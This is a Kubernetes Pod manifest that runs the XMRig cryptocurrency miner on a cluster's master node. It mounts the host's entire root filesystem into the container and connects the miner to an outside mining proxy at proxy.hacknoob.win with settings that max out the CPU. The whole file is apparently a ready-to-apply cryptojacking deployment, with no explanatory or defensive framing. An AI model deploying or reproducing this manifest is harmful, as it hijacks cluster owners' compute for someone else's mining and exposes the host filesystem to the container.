apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec-m
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - master
  containers:
  - name: xmrig-container-m
    image: busybox
    command:
    - /home/manager/xmrig/build/xmrig
    - -t
    - "3"
    - -o
    - proxy.hacknoob.win:5550
    - -u
    - master
    - -a
    - rx/0
    - --cpu-no-yield
    - --randomx-1gb-pages
    - --nicehash
    volumeMounts:
    - name: xmrig-volume-m
      mountPath: /
  volumes:
  - name: xmrig-volume-m
    hostPath:
      path: /
